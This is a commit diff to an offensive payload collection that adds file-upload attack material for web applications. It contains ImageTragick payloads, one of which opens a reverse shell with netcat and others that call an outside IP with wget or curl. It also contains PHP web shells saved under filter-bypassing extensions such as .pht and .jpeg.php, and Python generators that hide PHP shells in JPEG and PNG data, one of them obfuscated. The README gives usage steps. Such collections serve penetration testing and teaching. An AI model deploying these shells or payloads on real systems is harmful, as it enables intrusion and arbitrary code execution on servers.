Upload payloads

README.md

@@ -1,4 +1,4 @@
-# PayloadsAllTheThings
+# Payloads All The Things
 A list of every usefull payloads and bypass for Web Application Security
 
 TODO:
@@ -6,7 +6,6 @@ TODO:
 * Upload
 * Traversal Directory
 * Tar
-* SSRF
 * PHP Serialization
 * CSV Injection
 
@@ -14,5 +13,6 @@ To improve:
 * RCE
 * SQL injection
 * XXE
+* SSRF
 
 # /!\ Work in Progress : 1%

Upload/Image Tragik/detection_port_localhost_http.jpg

@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(http://localhost:PORT/)'
+pop graphic-context

Upload/Image Tragik/image_magik_reverse_shell.xml

@@ -0,0 +1,9 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
+"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg width="640px" height="480px" version="1.1"
+xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
+"http://www.w3.org/1999/xlink">
+<image xlink:href="https://example.com/image.jpg&quot;|/bin/nc.traditional 127.0.0.1 4242 -e /bin/bash&quot;"
+x="0" y="0" height="640px" width="480px"/>
+</svg>

Upload/Image Tragik/payload-http-log.png

@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
+pop graphic-context

Upload/Image Tragik/payload_rce_touch.jpg

@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
+pop graphic-context

Upload/Image Tragik/payload_rce_wget.gif

@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
+pop graphic-context

Upload/JPG Resize/README.txt

@@ -0,0 +1,5 @@
+# How to use
+b.php?c=ls
+
+
+Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l

Upload/JPG Resize/bulletjpg.py

@@ -0,0 +1,128 @@
+#!/usr/bin/python
+
+"""
+
+    Bulletproof Jpegs Generator
+    Copyright (C) 2012  Damien "virtualabs" Cauquil
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+    
+"""
+
+import struct,sys,os
+import gd
+from StringIO import StringIO
+from random import randint,shuffle
+from time import time
+
+# image width/height (square)
+N = 32
+
+
+def insertPayload(_in, _out, payload,off):
+	"""
+	Payload insertion (quick JPEG parsing and patching)
+	"""
+	img = _in
+	# look for 'FF DA' (SOS)
+	sos = img.index("\xFF\xDA")
+	sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
+	sod = sos_size+2
+	# look for 'FF D9' (EOI)
+	eoi = img[sod:].index("\xFF\xD9")
+	# enough size ?
+	if (eoi - sod - off)>=len(payload):
+		_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
+		return True
+	else:
+		return False
+
+if __name__=='__main__':
+
+	print "[+] Virtualabs' Nasty bulletproof Jpeg generator"
+	print " |  website: http://virtualabs.fr"
+	print " |  contact: virtualabs -at- gmail -dot- com"
+	print ""
+
+	payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
+
+	# make sure the exploit-jpg directory exists or create it
+	if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
+		print "[!] Please remove the file named 'exploit-jpg' from the current directory"
+	elif not os.path.exists('exploit-jpg'):
+		os.mkdir('exploit-jpg')
+		
+	# start generation
+	print '[i] Generating ...'
+	for q in range(50,100)+[-1]:
+		# loop over every payload		
+		for p in payloads:
+			# not done yet
+			done = False
+			start = time()
+			# loop while not done and timeout not reached
+			while not done and (time()-start)<10.0:
+				
+				# we create a NxN pixels image, true colors
+				img = gd.image((N,N),True)
+				# we create a palette
+				pal = []
+				for i in range(N*N):
+					pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
+				# we shuffle this palette
+				shuffle(pal)
+				# and fill the image with it			
+				pidx = 0
+				for x in  range(N):
+					for y in range(N):
+						img.setPixel((x,y),pal[pidx])
+						pidx+=1
+						
+				# write down the image
+				out_jpg = StringIO('')	
+				img.writeJpeg(out_jpg,q)
+				out_raw = out_jpg.getvalue()
+							
+				# now, we try to insert the payload various ways
+				for i in range(64):
+					test_jpg = StringIO('')
+					if insertPayload(out_raw,test_jpg,p,i):
+						try:
+							# write down the new jpeg file
+							f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
+							f.write(test_jpg.getvalue())
+							f.close()
+							
+							# load it with GD
+							test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
+							final_jpg = StringIO('')
+							test.writeJpeg(final_jpg,q)
+							final_raw = final_jpg.getvalue()
+							# does it contain our payload ?
+							if p in final_raw:
+								# Yay ! 
+								print '[i] Jpeg quality %d ... DONE'%q
+								done = True
+								break
+						except IOError,e:
+							pass
+					else:
+						break
+			if not done:
+				# payload not found, we remove the file
+				os.unlink('exploit-jpg/exploit-%d.jpg'%q)
+			else:		
+				break
+			

Upload/Metadata PNG/Build_image_to_LFI.py

@@ -0,0 +1,30 @@
+from PIL import Image
+
+# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
+# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
+
+#shellcode  = "<?=@`$_GET[c]`;"
+shellcode = "<?php system($_GET['c']); ?>"
+# --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
+shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"
+
+
+print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file"
+
+# Create a backdoored PNG
+print " - Creating a payload.png"
+im = Image.new("RGB", (10,10), "Black")
+im.info["shell"] = shellcode
+reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
+
+# undocumented class
+from PIL import PngImagePlugin
+meta = PngImagePlugin.PngInfo()
+
+# copy metadata into new object
+for k,v in im.info.iteritems():
+	if k in reserved: continue
+	meta.add_text(k, v, 0)
+im.save("payload.png", "PNG", pnginfo=meta)
+
+print "Done"

Upload/PHP Extension/Shell.jpeg.php

@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>

Upload/PHP Extension/Shell.pht

@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>

Upload/PHP Extension/Shell.phtml

@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>

Upload/PHP Extension/Shell.png.php

@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>

Upload/PHP Extension/Shell.shtml

@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>

Upload/README.md

@@ -1,12 +1,43 @@
-# Title
+# Upload
-Lorem	
+Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.	
-
-## Vuln
 
+## Exploits
+Image Tragik
 ```
-Code
+HTTP Request
+Reverse Shell
+Touch command
+```
+
+
+PHP Extension
+```
+.php
+
+Less known extension
+.pht
+.pgif
+.phtml
+.shtml
+
+Double extension
+.jpeg.php
+.png.php
+```
+
+
+PNG Bypass a resize - Upload the picture and use a local file inclusion
+```
+You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
+curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
+curl 'http://localhost/test.php?0=system' --data "1='ls'"
+```
+
+
+JPG Bypass a resize - Upload the picture and use a local file inclusion
+```
+http://localhost/test.php?c=ls
 ```
 
 ## Thanks to
-* Lorem
+* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
-* Ipsum